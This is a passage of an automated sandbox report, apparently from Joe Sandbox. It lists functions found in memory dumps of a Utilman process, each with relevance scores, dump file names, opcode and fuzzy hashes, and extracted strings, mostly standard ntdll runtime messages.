                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                            • API String ID: 0-484625025
                                                                                            • Opcode ID: 5e3e4428739d3bf3107861b87cc661bce25f983f461b1c8d55b45abb76bf60bf
                                                                                            • Instruction ID: f67c0c7ef9bc16386e3f28610d29fd4e39e0afda54f8d7db194730209f1feea8
                                                                                            • Opcode Fuzzy Hash: 5e3e4428739d3bf3107861b87cc661bce25f983f461b1c8d55b45abb76bf60bf
                                                                                            • Instruction Fuzzy Hash: 3651F931B00219BAEF21EB64EC99FAD77A9FF05310F0400E9E905AB2C1EB709A55CF54
                                                                                            Function 051B6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                            • Instruction ID: e4ddefeea26d51bf65dc11182a35b2046443872750d862311410c86062a798d8
                                                                                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                            • Instruction Fuzzy Hash: EC021571608341AFE305DF18C594AAEBBE5FFD8700F04892DF9894B2A5DB71E945CB42
                                                                                            Function 0512B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-$0$0
                                                                                            • API String ID: 1302938615-699404926
                                                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                            • Instruction ID: 427b94d15c4caca225a4f16339c4f5df90f77ebdb6643358b6b78f2b71bfbdd6
                                                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                            • Instruction Fuzzy Hash: 4A81C570E0D2699EDF28DF68C8517FEBBB2BF45310F188159D8A2A76D1C7349860CB51
                                                                                            Function 051920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: %%%u$[$]:%u
                                                                                            • API String ID: 48624451-2819853543
                                                                                            • Opcode ID: 2543c56ddba2a69fe7d024e6bcb781922ed699c1b14fca3d49137198307ac3ae
                                                                                            • Instruction ID: 8660c3d76f7f2ae4804ac1a7768b86345e82a4cb682403b86f816f782de5b0a7
                                                                                            • Opcode Fuzzy Hash: 2543c56ddba2a69fe7d024e6bcb781922ed699c1b14fca3d49137198307ac3ae
                                                                                            • Instruction Fuzzy Hash: 6A215E7AA00219ABDF14DF69D854AFEBBE9AF48650F040126E915E3201EB30DA118BA1
                                                                                            Function 0510F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 051502BD
                                                                                            • RTL: Re-Waiting, xrefs: 0515031E
                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 051502E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                            • API String ID: 0-2474120054
                                                                                            • Opcode ID: c78948ac01acbd445d2ee1830fe218e2c6e78c671c1a2e2f852f47882c7995bd
                                                                                            • Instruction ID: 434524df785ad9c2774ac7de112f06934b615e4f111ce7e4ae72250eeb9619e0
                                                                                            • Opcode Fuzzy Hash: c78948ac01acbd445d2ee1830fe218e2c6e78c671c1a2e2f852f47882c7995bd
                                                                                            • Instruction Fuzzy Hash: F8E1A030608741DFD735CF68C889B6AB7E1BB88324F140A1DF9A68B2D1D7B4D946CB52
                                                                                            Function 0511BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05157B7F
                                                                                            • RTL: Re-Waiting, xrefs: 05157BAC
                                                                                            • RTL: Resource at %p, xrefs: 05157B8E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                            • API String ID: 0-871070163
                                                                                            • Opcode ID: ee101e34c798aa8c41aaee8e898a70f6a56d42c7ed0764b8282e785acb4bbb71
                                                                                            • Instruction ID: 2fed9d9081143dfb9f397c403694bd26bbc51e14250e4521db7f14d5509de8c3
                                                                                            • Opcode Fuzzy Hash: ee101e34c798aa8c41aaee8e898a70f6a56d42c7ed0764b8282e785acb4bbb71
                                                                                            • Instruction Fuzzy Hash: 0E41D0317097029FC724DE25D841B6AB7E6FF89720F000A6DFC5A9B681DB70E4058B95
                                                                                            Function 0511B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0515728C
                                                                                            Strings
                                                                                            • RTL: Re-Waiting, xrefs: 051572C1
                                                                                            • RTL: Resource at %p, xrefs: 051572A3
                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05157294
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                            • API String ID: 885266447-605551621
                                                                                            • Opcode ID: 34c06ce1a4cd6790699307a4bc6058646602e3820a6c7f90f03c34ad46084ed9
                                                                                            • Instruction ID: b45ae1d9b9b7992e6fcdc50de245a5c5ce5583cfdfb19c2aa42a5c0299c38d6c
                                                                                            • Opcode Fuzzy Hash: 34c06ce1a4cd6790699307a4bc6058646602e3820a6c7f90f03c34ad46084ed9
                                                                                            • Instruction Fuzzy Hash: 4041E331708216ABC721DE25CC46F6AB7A6FF44760F104629FC66EB680DB31E852CBD5
                                                                                            Function 05192300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: %%%u$]:%u
                                                                                            • API String ID: 48624451-3050659472
                                                                                            • Opcode ID: 93a5a997e499ddfe13f6e33550f800cb67910a50544d100e652278af0b6c38b1
                                                                                            • Instruction ID: bb3561f0ae8481d1d2c89230cb7f9b679534979dd2541c93b91e78abfcafa105
                                                                                            • Opcode Fuzzy Hash: 93a5a997e499ddfe13f6e33550f800cb67910a50544d100e652278af0b6c38b1
                                                                                            • Instruction Fuzzy Hash: 34318476A00219AFCF24DF29DC45FEEB7F8FB48610F440556E859E3241EB30AA548FA0
                                                                                            Function 05403ABE Relevance: 6.3, Strings: 5, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4563317967.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_5400000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 95qp$g$p95w$ro|e$syta
                                                                                            • API String ID: 0-3214567825
                                                                                            • Opcode ID: 20c03c7bb130c051f68d8981d022a3497a69c03a6d1194a1146c22e1e2983197
                                                                                            • Instruction ID: dd61ad3283fc994e886dbcd88fb9e44297c33e3ceb855b6bc57d7b7da93b37e8
                                                                                            • Opcode Fuzzy Hash: 20c03c7bb130c051f68d8981d022a3497a69c03a6d1194a1146c22e1e2983197
                                                                                            • Instruction Fuzzy Hash: F1F0E97001C7848BC7089F01C4487AA7BE1FFD9349F501AAEE8C9DB251DB78C645878A
                                                                                            Function 05127D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-
                                                                                            • API String ID: 1302938615-2137968064
                                                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                            • Instruction ID: 52d3d7e4c4b44e4de353c93d8e253edfbb148df8ba1847370f8a6f329cc17230
                                                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                            • Instruction Fuzzy Hash: 8991D970E082359FDF28DF69C891ABFB7A6FF44320F14451AE865E72C0D73499A18761
                                                                                            Function 050E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $$@
                                                                                            • API String ID: 0-1194432280
                                                                                            • Opcode ID: 78e078378a6ac1b78c2b520717f2f3c5627df1a2576ffc43368bb6b1ba32627c
                                                                                            • Instruction ID: 9abea7fb358d6db46dbc1f2405e9cefff2af30dc2d1f64238acdaf1b9687c6e9
                                                                                            • Opcode Fuzzy Hash: 78e078378a6ac1b78c2b520717f2f3c5627df1a2576ffc43368bb6b1ba32627c
                                                                                            • Instruction Fuzzy Hash: 23814A75E002699BDB31CB54CC44BEEB7B9AB08750F0445EAEA19B7280D7709E80CFA0
                                                                                            Function 0516CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0516CFBD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallFilterFunc@8
                                                                                            • String ID: @$@4Cw@4Cw
                                                                                            • API String ID: 4062629308-3101775584
                                                                                            • Opcode ID: 0141aaeec6c248594763917cd6074dcc54ffb7eae84ccbb33c8511efd0d59b89
                                                                                            • Instruction ID: 30d0b3fbc50951677a7754dcff925f670e0092daa7d8127f8e484d3e437f3389
                                                                                            • Opcode Fuzzy Hash: 0141aaeec6c248594763917cd6074dcc54ffb7eae84ccbb33c8511efd0d59b89
                                                                                            • Instruction Fuzzy Hash: 8E41D271B01219DFCB21DFA8E944AAEFBB8FF54B10F40442AEA15DB250D778D851CBA1